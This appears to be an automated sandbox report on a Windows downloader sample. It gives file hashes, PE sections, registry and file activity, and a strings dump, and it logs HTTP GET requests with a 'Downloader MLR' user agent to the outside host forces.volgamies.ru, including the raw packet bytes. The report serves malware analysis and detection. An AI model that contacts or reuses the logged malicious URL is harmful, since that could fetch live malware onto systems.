Analysis Date2014-09-08 11:09:25
MD5a21687eb4edd7ab624ea389a6414e98a
SHA19020ccf0590d1d813675f7b5994a3b00d7fa172a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: 7a8783e02f394210206143418faa9634 sha1: f5f4fb350f437178e93020f762e06e2b3e1e35a4 size: 108544
SectionDATA md5: 1ae83722e96b570ab8306c8a824bf7e7 sha1: c9c1a7521c3c7c9128634cad43888ed09504ecab size: 11264
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: a456e4d5adbfb8bd8650ba9dbf1d1026 sha1: 7f7be9b15b0d81704736af083d2965e0e4e5ae90 size: 5632
Section.reloc md5: e8fbfec5efd0459497bd22bcb10b2edb sha1: 4b5156768455d6e0dc6e0a646c553fd27b8597ac size: 7680
Section.rsrc md5: 1d648c7e6687a55e473b1c4cee276c2a sha1: 723a02ae08fb782a872b0c4b2b5a47456cf755a5 size: 20480
Timestamp1992-06-19 22:22:17
PEhashf2a5a499ddc117784c6b1c3b5597b689499a2cce
IMPhashc618d6818c3ad46def39196135c120d8

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Process?

Process
↳ ?

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSforces.volgamies.ru

Network Details:

DNSforces.volgamies.ru
Type: A
193.105.245.210
HTTP GEThttp://forces.volgamies.ru/get_xml?stb=1&did=571017698&file_id=128526902
User-Agent: Downloader MLR 1.0.0
HTTP GEThttp://forces.volgamies.ru/get_xml?stb=1&did=571017698&file_id=128526902
User-Agent: Downloader MLR 1.0.0
Flows TCP192.168.1.1:1031 ➝ 193.105.245.210:80
Flows TCP192.168.1.1:1032 ➝ 193.105.245.210:80

Raw Pcap
0x00000000 (00000)   47455420 2f676574 5f786d6c 3f737462   GET /get_xml?stb
0x00000010 (00016)   3d312664 69643d35 37313031 37363938   =1&did=571017698
0x00000020 (00032)   2666696c 655f6964 3d313238 35323639   &file_id=1285269
0x00000030 (00048)   30322048 5454502f 312e310d 0a557365   02 HTTP/1.1..Use
0x00000040 (00064)   722d4167 656e743a 20446f77 6e6c6f61   r-Agent: Downloa
0x00000050 (00080)   64657220 4d4c5220 312e302e 300d0a48   der MLR 1.0.0..H
0x00000060 (00096)   6f73743a 20666f72 6365732e 766f6c67   ost: forces.volg
0x00000070 (00112)   616d6965 732e7275 0d0a4361 6368652d   amies.ru..Cache-
0x00000080 (00128)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000090 (00144)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f676574 5f786d6c 3f737462   GET /get_xml?stb
0x00000010 (00016)   3d312664 69643d35 37313031 37363938   =1&did=571017698
0x00000020 (00032)   2666696c 655f6964 3d313238 35323639   &file_id=1285269
0x00000030 (00048)   30322048 5454502f 312e310d 0a557365   02 HTTP/1.1..Use
0x00000040 (00064)   722d4167 656e743a 20446f77 6e6c6f61   r-Agent: Downloa
0x00000050 (00080)   64657220 4d4c5220 312e302e 300d0a48   der MLR 1.0.0..H
0x00000060 (00096)   6f73743a 20666f72 6365732e 766f6c67   ost: forces.volg
0x00000070 (00112)   616d6965 732e7275 0d0a4361 6368652d   amies.ru..Cache-
0x00000080 (00128)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000090 (00144)   650d0a0d 0a                           e....


Strings
m~.
.d
.e.U!..C
.
.[
I
9
..9
.:.
9999
9
...9.
9
.
.

;!;';:;
0 000@0P0`0p0
00050>0D0N0S0
0 0&060?0G0M0W0c0m0}0
0*080B0Q0W0]0x0
>(>0>5><>H>N>[>a>n>v>{>
05\Slf;
:$:*:0:6:<:A:G:S:Y:c:m:r:z:
: :':0:6:<:B:H:N:f:q:
0!Gt*_I
0M0X0t0z0
1%1/1=1C1M1S1Y1c1m1s1w1}1
1&1:1D1L1R1\1e1y1
1#191C1M1
161?1E1l1r1x1
171=1C1^1l1w1
19JMwMIX#;
1T&kNrJ
2"2&2*2.22262:2>2B2F2J2N2R2V2Z2^2b2f2j2n2r2v2z2~2
2&2,222D2J2P2_2
2$2-232=2C2M2S2_2i2q2w2~2
2"2,2S2Z2h2r2|2
2"3*323:3B3J3f3p3z3
;";*;2;:;B;J;R;Z;b;j;r;z;
:*:2:::B:J:R:Z:b:j:r:z:
2V2d2j2t2	7
">~!3%
3!31373=3C3I3T3^3d3l3}3
3$3/353>3D3J3b3h3n3t3z3
3f},<0
4'424:4A4G4R4a4g4u4}4
4#4-464G4M4
4(4.484>4D4t4~4
?(?.?4?A?I?N?U?a?k?u?
< <)<4<;<A<I<O<Z<`<f<r<x<
4.`bF"
;';.;4;:;B;L;T;Z;d;o;u;{;
> ?*?4?>?D?R?Z?d?
:$:*:4:F:L:V:
5"5.545:5@5K5U5]5c5m5v5{5
5(5.545P5Z5b5h5r5{5
5 5A5I5O5[5e5p5y5
=$=+=5=;=A=G=M=Y=_=l=r={=
=$=.=5=;=A=K=P=g=m=t=~=
>5>;>A>Q>[>c>i>s>
<(<.<5<?<E<K<Q<W<
< <'<5<;<E<L<T<g<m<v<|<
6,626B6L6V6k6~6
6!6'6-636>6T6Z6d6n6u6{6
6(6F6L6R6`6e6k6q6
=6=A=H=P=W=c=j=p=z=
<(<6<<<E<K<Q<W<^<m<x<
7-737=7_7q7
7%7/757;7A7G7M7S7\7b7h7~7
7#777B7L7R7_7i7o7u7~7
7%7/797A7H7R7X7c7{7
7B8W8h8
>$>7>=>D>Q>W>`>f>p>
?'?-?7?J?V?\?f?m?s?y?
8$828:8D8P8X8c8p8v8
8$8*848?8J8T8Z8g8q8w8}8
8HCCyL
9*909C9R9X9^9j9t9~9
9(929=9E9O9W9]9g9q9y9
9(93979G9Q9W9d9n9t9z9
9&9,939F9[9a9g9
9%9/999I9O9U9a9n9z9
=#=)=/=9=D=J=Q=[=a=g=m=s=
9]:h:M;S;a;i;s;Q<]<
9-"wG^+
>$>*>/>;>A>L>S>_>f>q>w>
AnyPopup
</assembly>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
AssignProcessToJobObject
$;=b7=
baW'8C
B@LS`LW
,|BPz{
C91*=&
CancelTimerQueueTimer
ChooseFontA
?C?I?S?Y?_?
ClearCommBreak
comdlg32.dll
COMDLG32.DLL
CreateJobObjectA
CreateMailslotW
D2COt0<
DeleteVolumeMountPointW
</dependency>
<dependency>
</dependentAssembly>
<dependentAssembly>
DFKW<z
d[^t<Zf
d'[y8s
E\,"0-
EnumSystemGeoID
et2,K b/
ExitProcess
f	fF B
FindAtomA
FindFirstVolumeMountPointA
FindNextFileA
F op,;
GA=D1=
GetCommandLineA
GetCommMask
GetConsoleTitleW
GetCPInfoExA
GetFileTitleA
GetFileVersionInfoW
GetProfileStringA
GetSystemDefaultLangID
GetSystemInfo
GetTimeFormatW
GlobalDeleteAtom
GlobalFindAtomW
.:G[yn,
}h8!OM
Heap32ListFirst
;";);/;>;H;P;V;`;s;~;
HueIrF
-%,i:%
I]#9.pa
.idata
IsBadStringPtrW
IsValidCodePage
J=E-5 
-J~K+qy{s
/	JLYB
joZHD]
k5'O{c6~(
K>e9&vEc
kernel32.dll
KERNEL32.DLL
?k>Gn5
\<l5eN
LoadLibraryA
LocalAlloc
LocalUnlock
LockFileEx
m6Mb\}
"N`?P+J"(
=<?O?b?u?
OhHi9D
OpenJobObjectA
=O=U=b=h=w=
o.y _*
PageSetupDlgW
P.rsrc
/q&!K8
qnfvgFc
@R/6QB
.reloc
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
<requestedPrivileges>
R'yL'vv"
</security>
<security>
SetInformationJobObject
}SFXX&
-&sJM+I^
sQhxFt
SystemTimeToTzSpecificLocalTime
T7X7d7h7l7p7t7x7|7
;td+G0:
t/f950 B
This program must be run under Win32
TlsAlloc
TlsFree
</trustInfo>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
u@:59 B
uR/*~\
\U+rd"
user32.dll
v,]BjN
VerFindFileW
VerInstallFileA
VerQueryValueA
version.dll
VERSION.DLL
VirtualLock
=vVR=J
WaitForMultipleObjects
WantArrows
WriteConsoleOutputA
WriteTapemark
wtsapi32.dll
WTSAPI32.DLL
WTSCloseServer
WTSEnumerateProcessesA
WTSRegisterSessionNotification
WTSSendMessageW
WTSVirtualChannelPurgeOutput
WTSWaitSystemEvent
",&|Xa
XbTdXSv
.xG3{S
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
y5k4:d
'z2xO8
)ZFeO9
Zj75T